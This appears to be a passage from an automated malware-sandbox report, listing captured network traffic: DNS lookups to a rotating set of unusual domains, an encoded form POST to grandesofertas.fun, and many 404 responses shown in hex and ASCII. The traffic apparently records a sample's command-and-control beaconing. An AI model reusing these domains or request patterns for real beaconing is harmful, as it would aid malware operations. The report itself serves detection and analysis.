                Source: global trafficDNS traffic detected: DNS query: www.questmatch.pro
                Source: global trafficDNS traffic detected: DNS query: www.callyur.shop
                Source: global trafficDNS traffic detected: DNS query: www.housew.website
                Source: global trafficDNS traffic detected: DNS query: www.nuy25c9t.sbs
                Source: global trafficDNS traffic detected: DNS query: www.madhf.tech
                Source: global trafficDNS traffic detected: DNS query: www.a1shop.shop
                Source: global trafficDNS traffic detected: DNS query: www.aiactor.xyz
                Source: global trafficDNS traffic detected: DNS query: www.sitioseguro.blog
                Source: global trafficDNS traffic detected: DNS query: www.optimismbank.xyz
                Source: global trafficDNS traffic detected: DNS query: www.nonpressure.beauty
                Source: unknownHTTP traffic detected: POST /5rfk/ HTTP/1.1Host: www.grandesofertas.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brConnection: closeContent-Length: 213Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Origin: http://www.grandesofertas.funReferer: http://www.grandesofertas.fun/5rfk/User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)Data Raw: 47 52 35 34 79 48 5a 38 3d 68 42 52 54 58 56 5a 5a 6f 71 66 46 51 34 64 6c 42 61 66 6e 62 43 43 38 46 59 56 39 4e 4f 58 38 7a 4f 42 53 79 57 6e 54 44 55 43 54 6b 6e 61 4d 48 6d 4e 32 5a 38 75 69 72 76 57 4c 53 32 4c 71 42 38 6c 56 31 51 36 50 4c 52 43 68 6d 30 6f 56 46 50 6b 79 74 6c 6c 61 31 47 71 63 75 57 71 53 34 78 67 4b 6a 57 75 36 4d 66 39 58 6c 42 49 30 52 4b 51 67 70 58 4b 57 6b 4a 31 4c 76 57 2f 4d 35 37 66 4d 45 7a 70 33 6c 69 6e 46 5a 59 71 65 66 30 39 49 38 42 61 41 44 2b 6b 71 39 41 41 52 4b 45 31 78 44 55 43 4d 33 37 45 4b 56 30 61 36 68 65 72 55 48 57 35 77 34 54 70 32 79 73 44 6b 52 4a 41 75 61 4d 33 78 74 42 47 46 Data Ascii: GR54yHZ8=hBRTXVZZoqfFQ4dlBafnbCC8FYV9NOX8zOBSyWnTDUCTknaMHmN2Z8uirvWLS2LqB8lV1Q6PLRChm0oVFPkytlla1GqcuWqS4xgKjWu6Mf9XlBI0RKQgpXKWkJ1LvW/M57fMEzp3linFZYqef09I8BaAD+kq9AARKE1xDUCM37EKV0a6herUHW5w4Tp2ysDkRJAuaM3xtBGF
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 07:31:49 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jv1Yjc7qorQkIAKyPansiI5oqvUUETMy1uuq4ctnrDLXcEOcc2xNUxD0SYuCrqvz2Sp2MLN87KyiJYVwhTPeZ7RbXy7NDIbj5DCJSx45sg%2BUMXayoAC3rxjtgA2%2Fntdc3%2BhxwwSlqixg"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e56be1a4d79c44f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1453&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=560&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>10
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 07:32:19 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 07:32:21 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 07:32:24 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 07:32:26 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 07:32:32 GMTContent-Length: 0Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q8qsgZKpL5%2BIEMLkgPctW4ezvVIezvcx1vZFZN5KOK27eIP2yS09Rl6Pbie6JGA1GpFKwM9tjbc1NzZpgqLkaQxEiVkoxRXzYGLUqnHuSL4LBq2jQKSVVrXEpu5c%2F7U1lymrzA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e56bf27d96618b4-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1497&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=813&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 07:32:35 GMTContent-Length: 0Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K2QjhaMdPZUpTPf9YQKgxyrpiCFTXdfj4i51kY9YJ94UdBGPC5e1MWP1souS5GFU9ZsrGVQ2tl7qCWEAXH6TsBpu1FspQnqLQc9qgt6%2FUoL5e3Ix1tKHD3tP2g%2Bn2zjEpy1NWw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e56bf37bc16c40c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1469&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=837&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 07:32:37 GMTContent-Length: 0Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fsOM0cobQUnoO9b4LskZpsWXiuu4iqNSuQgzfS9oIkeaXTh6881BbxO0BILvhBxIMpn36iJPjDWnrJEVzi5ZEhOAxdXH1oCuvyIJS13FxVD43xxum9oZbcSe%2FUJEI%2B0MZNeojw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e56bf47eef07c81-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1987&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1850&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 07:32:40 GMTContent-Length: 0Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qtY4I4%2FPOl8mcAanVs610Df1xiU8L%2BOlIimEsI4ATtgSjSLCA5oEhz0l2Ia1b%2BKjrqq18l0uW7jVxxsam1eT0eEZY2RP2wbrewnLX9qrwjncEctnzKAgJOTSNwNfh0JGu1XNng%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e56bf57ec2f42b0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1572&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=555&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 20 Nov 2024 07:32:53 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-11-20T07:32:58.8059698Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 20 Nov 2024 07:32:59 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 20 Nov 2024 07:33:02 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 